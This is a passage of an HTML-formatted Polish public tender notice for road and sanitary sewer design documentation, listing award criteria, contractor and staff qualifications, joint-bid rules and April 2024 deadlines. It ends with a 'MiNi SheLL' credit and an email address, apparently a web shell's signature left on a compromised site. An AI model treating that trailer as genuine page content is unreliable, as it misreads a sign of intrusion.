class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie zawodowe personelu - branża sanitarna</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące: postępowaniu<br/>1.1. zdolności do występowania w obrocie gospodarczym;<br/>Zamawiający nie określa warunku w ww. zakresie.<br/>1.2. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów;<br/>Zamawiający nie określa warunku w ww. zakresie.<br/>1.3. sytuacji ekonomicznej lub finansowej;<br/>Zamawiający nie określa warunku w ww. zakresie<br/>1.4 zdolności technicznej lub zawodowej w zakresie:<br/>O udzielenie zamówienia publicznego mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące zdolności technicznej lub zawodowej. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia. Zamawiający uzna warunek za spełniony jeśli Wykonawca wykaże, że:<br/>a) wykonał należycie nie wcześniej niż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie minimum dwie (2) odrębne usługi w zakresie opracowania dokumentacji projektowej<br/>o charakterze liniowym (drogowym), polegających na budowie lub przebudowie lub remoncie drogi o długości minimum 1,2 km każdy;<br/><br/>b) wykonał należycie nie wcześniej niż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie minimum dwie (2) odrębne usługi w zakresie opracowania dokumentacji projektowej dotyczącej budowy kanalizacji sanitarnej o długości min. na 5 km;<br/><br/>c) dysponuje lub będzie dysponować w okresie wykonywania zamówienia i skieruje do jego realizacji min. jedną osobę posiadającą uprawnienia do projektowania z co najmniej 5-letnim doświadczeniem zawodowym na stanowisku projektanta<br/>w specjalności inżynieryjnej drogowej bez ograniczeń lub odpowiadające im równoważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów, a w przypadku Wykonawców zagranicznych – uprawnienia budowlane do projektowania równoważne do wyżej wskazanych.<br/><br/>Osoba skierowana do pełnienia tej funkcji winna posiadać doświadczenie w projektowaniu tj. realizacja minimum jednej usługi w zakresie opracowania dokumentacji projektowej budowy/ rozbudowy/ przebudowy/ remontu drogi o długości minimum 1,2 km.<br/><br/>d) dysponuje lub będzie dysponować w okresie wykonywania zamówienia i skieruje do jego realizacji min. jedną osobę posiadającą uprawnienia do projektowania z co najmniej 5-letnim doświadczeniem zawodowym na stanowisku projektanta<br/>w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych<br/>i kanalizacyjnych bez ograniczeń lub odpowiadające im równoważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów, a w przypadku Wykonawców zagranicznych – uprawnienia budowlane do projektowania równoważne do wyżej wskazanych<br/>Osoba skierowana do pełnienia tej funkcji winna posiadać doświadczenie w projektowaniu tj. realizacja minimum jednej usługi w zakresie opracowania dokumentacji projektowej budowy kanalizacji sanitarnej o długości min. na 5 km. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) wykazu usług wykonanych nie wcześniej niż w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których usługi te zostały wykonane, sporządzonego zgodnie z Załącznikiem Nr 7 do SWZ, oraz załączeniem dowodów określających, czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest wstanie uzyskać tych dokumentów –inne odpowiednie dokumenty – w odniesieniu do warunku określonego w pkt. 6.1.4. lit. a) i b) SWZ.<br/>2) wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami sporządzonego zgodnie z Załącznikiem Nr 8 do SWZ – w odniesieniu do warunku określonego w pkt. 6.1.4. lit c) i d) SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Załącznik nr 3a do SWZ - wykaz w zakresie niezbędnym do oceny oferty<br/>w kryterium doświadczenie zawodowe personelu wraz z dowodami potwierdzających doświadczenie zawodowe projektanta polegające na wykonaniu dokumentacji wykazanych w załączniku nr 3a <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>a) oświadczenia o których mowa w pkt. 8.1 SWZ składa z ofertą każdy<br/>z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>b) w przypadku, o którym mowa w rozdziale 6.3 SWZ Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie,<br/>z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy. Oświadczenie należy złożyć wg wymogów załącznika nr 6 do SWZ.<br/>c) zobowiązani są oni na wezwanie Zamawiającego, złożyć podmiotowe środki dowodowe, o których mowa w pkt. 8.3 SWZ, przy czym podmiotowe środki dowodowe, o których mowa w pkt. 8.3.1 SWZ składa odpowiednio Wykonawca/Wykonawcy, który/którzy wykazuje/-ą spełnienie warunku.<br/>3. Jeżeli została wybrana oferta Wykonawców wspólnie ubiegających się<br/>o udzielenie zamówienia, Zamawiający może żądać przed zawarciem umowy<br/>w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Projekt Umowy stanowi Załącznik Nr 2 do SWZ.<br/>2. Zamawiający przewiduje możliwości wprowadzenia zmian do zawartej umowy, na podstawie art. 454-455 ustawy Pzp oraz postanowień Projektu Umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-04-05 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-04-05 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-04-30</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamawiający nie dopuszcza składania ofert częściowych.<br/>2. Zamawiający nie dopuszcza składania ofert wariantowych.<br/>3. Zamawiający nie przewiduje wymagań wskazanych w art. 96 ust. 2 pkt 2 ustawy Pzp.<br/>4. Zamawiający nie przewiduje zamówień, o których mowa w art. 214 ust. 1 pkt 7 i 8 ustawy Pzp.<br/>5. Zamawiający nie wymaga przeprowadzenia przez Wykonawcę wizji lokalnej lub sprawdzenia przez niego dokumentów niezbędnych do realizacji zamówienia,<br/>o których mowa w art. 131 ust. 2 ustawy Pzp.<br/>6. Zamawiający nie przewiduje rozliczenia między Zamawiającym a Wykonawcą<br/>w walutach obcych.<br/>7. Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu.<br/>8. Zamawiający nie wymaga obowiązku osobistego wykonania przez Wykonawcę kluczowych zadań zgodnie z art. 60 i art. 121 ustawy Pzp.<br/>9. Zamawiający nie przewiduje zawarcia umowy ramowej.<br/>10. Zamawiający nie przewiduje wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej wraz z informacjami, o których mowa w art. 230 ustawy Pzp.<br/>11. Zamawiający nie stawia wymogu lub możliwości złożenia ofert w postaci katalogów elektronicznych lub dołączenia katalogów elektronicznych do oferty, w sytuacji określonej w art. 93 ustawy Pzp.<br/>12. Zamawiający w oparciu o art. 95 ust. 1 Pzp informuje, że zakres usługi opracowania dokumentacji technicznej nie wymaga zatrudnienia przy realizacji zamówienia przez Wykonawcę lub podwykonawcę, osób na podstawie umowy<br/>o pracę w rozumieniu art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. – Kodeks pracy (Dz. U. z 2020 r. poz. 1320 z późn. zm.).

Creat By MiNi SheLL
Email: jattceo@gmail.com